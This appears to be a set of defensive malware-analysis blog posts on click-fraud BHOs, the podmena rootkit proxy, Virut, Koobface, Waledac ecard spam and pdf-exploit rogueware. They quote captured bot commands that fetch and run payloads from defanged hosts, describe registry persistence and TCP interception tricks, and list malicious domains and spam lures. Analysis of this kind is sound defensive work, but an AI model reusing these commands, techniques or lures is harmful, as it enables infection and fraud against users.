Initially this DLL is loaded with regsvr32.exe, in order to perform an installation.  It installs a GUID in the “Browser Helper Objects” registry key which tells Internet Explorer where to find the DLL on disk.  Next it installs an executable (ctfmon_qj.exe) which will start any time the ctfmon.exe executable is launched.  It does this by inserting a “Debug” registry value in the “SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ctfmon.exe” registry key.  This causes ctfmon_qj.exe to be launched instead of ctfmon.exe, as it is being treated as the “debugger” for ctfmon.exe.

Ctfmon_qj.exe, when run, launches the actual ctfmon.exe; then proceeds to launches Internet Explorer.  This would guarantee that the browser helper object is loaded as soon as ctfmon.exe executes.  Once loaded, the DLL sits in Internet Explorer waiting for someone to navigate to a URL, such as clicking the “Search” button on google.com.  The destination URL is then scanned by the BHO for live.com, yahoo.com, and google.com.  If one of these domains are found in the URL, it starts looking for the search term, which is usually prefaced with something like, “&q=TERM” in Google’s case, or “&p=TERM” in Yahoo’s. It then harvests these query terms for later use and possibly evasion of click fraud detection algorithms.

After the term is found, a connection is made to takeasearch .com and the Bho sends the search term and a machine identification number, which is derived from your primary hard disk’s serial number.  The information that the takeasearch .com site returns tells the BHO what to do next.  There are several commands that can be returned from the web presence: DL:, GO:, REF: and OK:.

The first code path for the Bho to take depends on the returned data containing “DL: URL”. The BHO will send an Http GET to the URL as specified by the “DL:” command, saving the response to a file in the “C:\Program Files” directory, naming it “KB%i.exe”. The %i represents a random number generated by the rand() function.  The downloaded file is then executed via the ShellExecute() API.

If the response contains “GO: “, followed by a URL, the browser will be redirected to that URL.  There is also a timer that runs within Internet Explorer that will control the malware’s launch of a new instance of IE. This instance of  Internet Explorer is launched with a hidden window, so the browser runs on the system without the user’s consent or knowledge. The hidden browser will periodically connect to searchaccelerator .net with the machine identification token. As witnessed with the takeasearch .com result, if a “GO: ” response is provided to the hidden browser, it will be sent to several addresses that redirect the browser to its final destination. This final destination page is covered with ads that reportedly are “pay per impression” with revenues split between affiliates.

Here’s a sample conversation from the “hidden” Internet Explorer window. It is full of redirection:

1) GET http ://searchaccelerator .net/qi3.php?YBNz(shortened)
SERVER HTTP RESPONSE:
REF:http ://totalfinder .info/ search.php?q=Insurance%20recovery%20cars|GO:http ://totalfinder. info/clicks?719578181|DST:comparedby.us1234|RVER:80|TIMW:8|

We can see that the response contains several pieces of information, delimited by the vertial-pipe character. All of this information specifies the queries that the malware running on the user’s system is to carry out. The REF field tells the BHO to set the “Referrer: ” http header to the specified URL when sending a GET to the target URL, specified by the GO field.  The DST field is the browser’s final destination.

2) GET http ://totalfinder .info/ clicks?719578181
SERVER HTTP RESPONSE:
HTTP/1.1 302 Found
Server: Apache/1.3.41 (Unix) PHP/5.2.9
Location: http: //totalfinder .info/ search.php?q=Insurance%20recovery%20cars&sess=719578181

We can see in the response that the web server at totalfinder .info has redirected the browser via the “302/Found” HTTP response code to the next url. This subsequent url is also on the totalfinder .info domain, but this time, we observe high value search terms present in the URL itself: “Insurance recovery cars”. The redirection contains additional information, in our labs, we observed that these queries were most likely harvested from other infected systems, in an effort to randomize the redirected query terms.

3) http ://totalfinder .info/search.php?q=Insurance%20recovery%20cars&sess=719578181
SERVER HTTP RESPONSE:
<html><body><form name=”formrfgz” action=”http://68.169.70. 144/ go.php” method=”GET” target=”_top”><input type=”hidden” name=”c” value=”—truncated for brevity—”></form><script language=”JavaScript”>formrfgz.submit();</script></body></html>

On the third leg of redirections, we can see the that we actually load a regular web page with some html and a javascript.  On this page there is a form, with an action attribute that contains a URL to which the formrfgz.submit() function will tell the direct the browser to fetch this url.

4) http://68.169.70. 144/ go.php?c=truncated-for-brevity-again
SERVER HTTP RESPONSE:

HTTP/1.1 302 Moved Temporarily
Server: nginx
Content-Type: text/html
Location: http ://3151.90539.discover-facts .com/jump1/ ?affiliate=3151&subid=90539&terms=insurance%20recovery%20cars&sid=TRUNCATED&a=zh5&mr=1&rc=0

Again, we see another 302 status redirect to a different URL.

5) GET http ://3151.90539.discover-facts .com/jump1/ ?affiliate=3151&subid=90539&terms=insurance%20recovery%20cars&sid=TRUNCATED&a=zh5&mr=1&rc=0
SERVER HTTP RESPONSE:

<script language=”javascript”>
function v3clicktoit ()
{
document.clickit.submit();
}
</script>

<body bgcolor=”#FFFFFF” OnLoad=”Javascript:v3clicktoit()”>
<form name=”clickit” method=”POST” action=”/jump2/?affiliate=3151&subid=90539&terms=insurance%20recovery%20cars”>
<input type=”hidden” name=”kw” value=”insurance recovery cars”>

The fifth redirect loads a regular webpage as was seen in redirect 3, and it uses the same submit() javascript function to direct the browser to “POST” the form, to the next URL.

6) http://3151.90539.discover-facts .com/jump2/ ?affiliate=3151&subid=90539&terms=insurance%20recovery%20cars
SERVER HTTP RESPONSE:
<frame name=’target’ src=”http ://r.looksmart .com/og/ ad=725195471;ag=732989664;kw=930857280;qt=insurance%20recovery%20cars;ip=127.0.0.1;geo=0;vid=0;rm=|http ://www.comparedby .us/ lander.aspx?pmkeyword=insurance%20recovery%20cars&referrer=looksmart-a&camp=Moxy+H+RON&group=Moxy+H+RON&keyword=insurance%20recovery%20cars”>

As we near completion of our redirects, we can see a frame on this page, which loads the ‘target’ url which is on the r.looksmart .com domain.  It contains many parameters in the URL, which was shortened a bit, but still shows some of the interesting pieces of information being passed along.  From what we’ve seen thus far, we can speculate that there is an advertisement id, advertisement group, keyword id, query term, the computers external IP address, geological location id, and a the destination URL.

7) http ://r.looksmart .com/og/ …
RESPONSE:
HTTP/1.1 302 Found
Location: http ://www.comparedby .us/ lander.aspx?pmkeyword=insurance%20recovery%20cars&referrer=looksmart-a

After this last “Found” redirect, we arrive out our destination. Here is a list of final destinations for the Bho and hidden IE process, and matching query terms returned by the servers:

iaf .net — injury lawyer
yb .com — maricopa employment
theyellowpages .com — car insurance quotes
comparedby .us — sewing material
theyellowpages .com — fish window cleaning
comparedby .us — memory tattoos
glimpse .com — QUEST SECURITY
allthebrands .com — sowing machine
yellowpages.lycos .com — teleflora
hotjobs .com — lyrics to anberlin unwinding cable car
hotjobs .com — mortgage companys in brownsville
theproductdepot .net — where does ivy tech culinary arts program rank
healthline .com — commercial locksmiths contra costa
yellowbook .com — will st johns wort stop pantic attacks
freepornvideos .com — anniversary party
hilcoind .com — scoliosis
longmontflorist .com — hall funeral home
milehigh-harley .com — www rentals
comparedby .us — advanced driver improvement

In all search queries above, the common points of redirect are 206.161.121. 110, 68.169.70. 144, local-search-pages .com, discover-facts .com, find-dozens .com.  Not coincidentally, all of the domains hide behind the same privacy registration service, making whois registration information unavailable.

In some instances, the search query is handed off to pay-per-click advertising sites and in others it passes the search directly to a site with an affiliate-id. It’s a complicated trail to follow, considering all of the redirections and affiliates, but the end result is artificially generated traffic to ad-serving sites. And stealing real search queries, misspellings and all, help to create data that best replicates input from a real online “consumer”.

The FTC’s complaint from December calls this stuff scareware, also called “rogueware”. It’s amazing how many users really fell for and continue to fall for this stuff, and then cannot get their money back. According to the complaint:
“Unaware of the Defendants’ trickery, more than one million consumers have purchased the Defendants’ software products to cure their computers of the non-existent problems “detected” by the Defendants’ fake scans…
Although some consumers later realize they have been defrauded by Defendants and attempt to seek refunds, Defendants routinely delay, obstruct and refuse to honor such requests.”

The two “podmena” files dropped by the phony codec/viewer installs seem to be gathering much interest and gaining prevalence. They’ll be discussed here and the post itself will be updated with new information as it is uncovered.

First off, the files are dropped as one of the may payloads during the phony codec downloader attacks described in previous posts here, here and here. The components seem to be a part of a click fraud scheme and a way to generate potentially artificial traffic volume to several search engines, including bee-find.com, missngpage.com, 102.123bounce.com, and www.search.pro.

Podmena.dll gets registered as a ServiceDll to be run via svchost.exe -k podmena.dll.
Podmena.sys is installed as a kernel driver to run at startup and attaches to \Device\Tcp, intercepting all tcp related IRPs.

The Dll upon startup sends a DeviceIoControl() request to the driver opened on \\.\podmena\. The initial IO control code tells the driver to monitor outbound tcp port 80, and redirect all packets to 127.0.0.1:8085. Then, the dll sends a second io control code to the driver, which activates the forwarding.

The Dll will create a bound listening port on 8085 which now acts as an HTTP proxy for all outbout port 80 traffic. Upon packet reception (after it is redirected by the driver), the Dll will scan the requested url for search keywords based on the domain name of the request. (ie: search.yahoo, google, youtube, yahooapis, metacafe, sugg.search, aolcdn, etc)

When a keyword is found, it will submit the text to its parent controller (the binaries that we have seen hard code “zz-dn.com”, which is unavailable, and then falls back to 85.13.236.134, an ip hosted in London). Depending on some timing randomization, the Dll will then load up and send the web browser to urls based on the response it receives back from this parent controller.

In our lab, subsequent requests were sent to a variety of sites, with all of these sites hosting a variety of ads, even without visiting a search engine. The svchost process loaded up with podmena.dll can visit hundreds of sites approximately every ten minutes, depending on the instruction response it receives.

Oddly, we have not seen higher target moneymakers like banking userid’s and passwords stolen by these components.

Are viruses the thing of yesteryear? Not at all. Is it another 29A, another group of kids looking for some thrills and recognition of their virus writing skills? No. What we find is that the hosting server, the downloads, and the multiple layers of effort are well orchestrated and financially motivated.

The family uses all sorts of tricks to distribute itself and many other components. Much has already been written on its changing infection, encryption, memory residence, injection, html file appending, and hooking techniques. But what is the group behind it up to now?
This summary will put together a few more key points on the threat’s current activity and its hosts. The threat itself comes from a number of servers and delivers a variety of malware. We’ll see that it is responsible for far more than infected files and Irc traffic, including adware, rootkits, password stealers, worms and spambots.

Virut’s current strain of executable infector is highly prevalent. The ThreatFire community has prevented tens of thousands of a couple of the newest Virut variants over the past couple of months. In fact, this executable infector is redeveloped quickly and often, and has been known to be buggy so that disinfection routines by the major Av vendors may end up corrupting the executable files that are meant to be cleaned when detected.

DO NOT VISIT THE MALICIOUS WEBSITES DESCRIBED HERE…

The first server that the current active Virut variant attempts to connect with is irc.zief.pl, oddly enough, over port 80 for its IRC session. It joins one of the channels there to receive private messages instructing it to download more malware:

NICK xxx
USER xxx. . :#xxx Service Pack 3
JOIN #.xxx

:u. PRIVMSG xxx:!get hxxp://cock.8866. org:88/files/adx.gif (Spyware downloader)
:u. PRIVMSG xxx:!get hxxp://dl.guarddog2009. com/cw.exe (Koobface variant)
:u. PRIVMSG xxx:!get hxxp://goasi. cn/ex/a.php (serves “load.exe” malicious downloader)
:u. PRIVMSG xxx:!get hxxp://85.114.131. 69/ad2.exe (malicious ad-popper)
PING :l.
PONG :l.
PING :l.
PONG :l.

Of those domains, it is interesting that the “dl.guarddog2009.com” is actively serving Koobface worm variants and ad popupers, considering that they are peddling scareware/rogueware from the same ip. Avoid it:

Once running, these additional pieces of malware download other nastiness in the background:
hxxp://avhtm.8866. org/files/av.htm (spambot dropper)
a POST is sent to main15052009. com/achcheck.php
hxxp://74.52.164. 210/pk/bb021908.exe (malicious downloader)

another POST is sent up to main15052009. com/ld/gen.php, with a recognizable Koobface response:
#PID=xxx
START|hxxp://www.i-site. ph/1/6244.exe (Bho dropper)
START|hxxp://www.i-site. ph/1/nfr.exe (proxy component)
WAIT|120
#BLACKLABEL
EXIT

hxxp://ji-u. cn/506.exe <-- hxxp://goasi. cn/dll/abb.txt (renamed to reader_s.exe and run, an updated Virut backdoor variant)

An unusual user-agent rears its head:
GET /ad2.exe HTTP/1.0 (malicious ad-popper listed above)
User-Agent: Download
Host: 85.114.131.69
Pragma: no-cache
(Incidentally, 85.114.131.69 is the host to s2.zief. pl and dl.guarddog2009. com.)

Additional files downloaded:
hxxp://ipkipk.3322. org/ipk.exe (downloader/adclick component)
hxxp://xz.wanggui. com/mem322.exe (downloader for password stealers)
hxxp://www.dofulfill . net/loadersvc.exe

All the while, in the background, multiple phantom queries are sent out to multiple servers, in an effort to increase click traffic at various sites, including job sites.

And then comes the spam. Infected machines spew spam containing messages like
“If you don’t feel like a complete person because you can’t afford luxury things to look stylish and elegant, you can forget about this feeling. We offer you fantastic deals on fantastic watches.”
A link is included that takes you to a “group” at a major provider, where knockoff watches and bags appear to be for sale. A click on an image redirects the user to sites like “trylamp. com”. Often, other pieces of spam carry offers for pills of all kinds.

So far, getting the user to run an executable (or exploiting a system running vulnerable third party pdf reader plugins) that modifies the hosts file with “browser-security.microsoft.com” to redirect to 195.245.119.131 and launch a browser to a page on that domain seems to be a fairly prevalent tactic. The links on the page direct the user to pay for another piece of rogueware called “Spyware Protect 2009″. In no way is this site associated with the real microsoft.com web presence.
Other domains shared by the group right now are sys-protection.com, sysguard2009.com, os-protection.com, swp2009.com, spy-protect-2009.com, spywprotect.com and some adult entertainment links. Avoid these domains and rogueware.

Update: The “Malware Analysis and Diagnostic” blog posted some additional information on the rogueware. Looks like an interesting blog, and for english readers, Google translate is your friend.

Update: More of the same technique found here.

Update: Michael Hale Ligh posted details of his investigation into a related incident here. In an update, he comments that the user’s system had an outdated version of Adobe Acrobat Reader, which was most likely the targeted vulnerable application. It’s excellent work and a great read for those interested in technical details.

hxxp://2009download-best-soft.com
hxxp://best-ps-download-4pc.com
hxxp://downloabsecurehere1.com
hxxp://downloabsecurehere2.com
hxxp://downloabsecurehere3.com
hxxp://downloabsecurehere4.com
hxxp://download-all4free.com
hxxp://download-allsoftnow.com
hxxp://download-files-bak.net
hxxp://download-fls.com
hxxp://download-softarch.com
hxxp://download-top-software.com
hxxp://download-top-software.net
hxxp://downloadall-soft-now.com
hxxp://downloadallsoft-now.com
hxxp://downloadallsoftnow.com
hxxp://dwnld-files.com
hxxp://fast-download-base-free.com
hxxp://files-upload-21.com
hxxp://get-files-4free.net
hxxp://get-frsh-files.com
hxxp://go-downloadz-pc-soft.com
hxxp://load-software-dowload.net
hxxp://pure-download-new.net
hxxp://soft-4-you-download.net
hxxp://top-best-software-area.net
hxxp://2009download-best-soft.com
hxxp://best-ps-download-4pc.com
hxxp://downloabsecurehere1.com
hxxp://downloabsecurehere2.com
hxxp://downloabsecurehere3.com
hxxp://downloabsecurehere4.com
hxxp://download-all4free.com
hxxp://download-allsoftnow.com
hxxp://download-fls.com
hxxp://download-softarch.com
hxxp://download-top-software.com
hxxp://download-top-software.net
hxxp://download-top-software.net
hxxp://downloadall-soft-now.com
hxxp://downloadallsoft-now.com
hxxp://downloadallsoftnow.com
hxxp://dwnld-files.com
hxxp://fast-download-base-free.com
hxxp://files-upload-21.com
hxxp://get-frsh-files.com
hxxp://go-downloadz-pc-soft.com
hxxp://load-software-dowload.net
hxxp://pure-download-new.net
hxxp://soft-4-you-download.net
hxxp://top-best-software-area.net

The Waledac operators have automated a fairly predictable registration and setup of their malicious web sites and corresponding online pharmaceutical sites reported as fraudulent. They are abusing fast flux dns at an impressive rate as well.
DO NOT VISIT THESE SITES. THEY ARE MALICIOUS AND MAY INFECT YOUR SYSTEM IF YOU CHOOSE TO VISIT THEM WITH A WEB BROWSER. Here are a few that were registered and set up this morning. Be aware that this spamming/botnet operation is an ongoing one:
hxxp://topgreetingsite.com
hxxp://www.greetingsupersite.com
hxxp://www.greetingcardgarb.com
hxxp://greetingcardcalendar.com
hxxp://directchristmasgift.com

You get the idea. Do not fall for the links being spammed out in email messages as ecard deliveries and do not fall for the current “card.exe” being distributed.

And here is an example message spammed out by the Waledac worm:
“Jeff has mailed a e-card.
Just click on the following Internet address:
hxxp://your regards.com/ ?ID=5b830b13b073c19cabc3a06878d
Brought to you by 123Christmas-Greetings!”

Spammed message here using the Christmasbuzz name:
“Thomas has sent an e-card.
Click on the following link or copy and paste the following link into your web
browser’s address bar: hxxp:// smart cardgreeting.com/ ?code=844e643ab7
(c) Christmasbuzz.com”

Legitimate Christmasbuzz site looks like this snapshot:

Another spammed message from the worm:
“Thomas sent you a ecard.
Click on the following link to see your Ecard:
hxxp://world greetingcard.com/ ?id=1025025ecd
Thanks for Using Card Fountain!”

And the corresponding legitimate Card Fountain web site here:

Do not randomly click on links emailed to you, as pointed out previously. Ecards and greetings can be a sore spot for a lot of users before and after the holiday seasons, but it can be nice to receive holiday wishes when they come from legitimate sites.
Also note that most of the legitimate sites provide users with flash movies and other animated cards, instead of the “card.exe” malcode.

Current malicious sites are serving exploit pages and “card.exe” at the following domains, do not visit them. Some were registered by the botherders earlier today, along with a slew of domains that are now hosting online canadian pharmacy sites:
eternalgreetingcard.com
worldgreetingcard.com
smartcardgreeting.com
superyearcard.com
cardnewyear.com
newyearcardonline.com
youryearcard.com
newyearcardcompany.com
bestyearcard.com
newyearcardservice.com
newyearcardfree.com
The guys over at Shadowserver posted a writeup on the worm to close out 2008, and included a list of domains being used by the botherders at the time. The distributors continue to be active.

And why might this Storm copycat scheme come back in vogue? Spam, of course!
In addition to the links to malicious attacking sites being sent out (posted in the description above), holiday-themed, seasonal spam containing links to online Canadian pharmacies peddling viagra and “enhancement” drugs are being blasted by infected systems as well:

“Subject: When going on holiday take bluepills with you to ensure potence!
We have everything to make your love more passionate.
hxxp:// thank believe.com/”

“Be ready for spring love marathon! hxxp:// character effect.com/”

“Start enjoying your xxxlife! hxxp:// grew ten.com/”

“Subject: How intresting is your bedroom life?
Dont put your health at stake! hxxp:// what least.com/”

“Subject: Latest news from your doctor.
Our experts recommend! hxxp:// steam coast.com/”

It appears to be a fairly international spamming effort with DNS domains rapidly being registered in China and Latvia, exploit pages served in the U.S., and pharma sales coming out of Canada off of servers hosted in China.

When run, this little fsg packed executable crashes. Before it does, it sends information to a web server about the user’s workstation, and injects an adware component into explorer.exe. Always exercise caution around these sorts of networks. We’ll post more details here soon.

A number of web sites are delivering a variety of exploits to get this rogueware on your system. One method of delivery that seems to be very reliable is via a set of malformed pdf files. The malware files exploit various versions of the Adobe pdf reader, delivering download and execute shellcode, calling URLDownloadToFileA on hxxp://svc .ms / xrun.tmp, and Winexec on that download.

This file is a custom packed downloader. After a long delay, it contacts multiple web sites, then pulls down a number of files, including another awful Vundo package that was at the top of hit lists for years.
The first popup from the downloaded adware on the system was redirected to the Antivirus 360 Web Scanner, which is nothing more than cheap javascript pretending to scan one’s hard drive and fraudulently claim malware is littering the system. On another system, we saw VirusRemover2008 being hucked by the redirected popup with lots of fraudulent detections and shocking warnings.

So please, keep this stuff off of your system. Update all third party plugins on your system.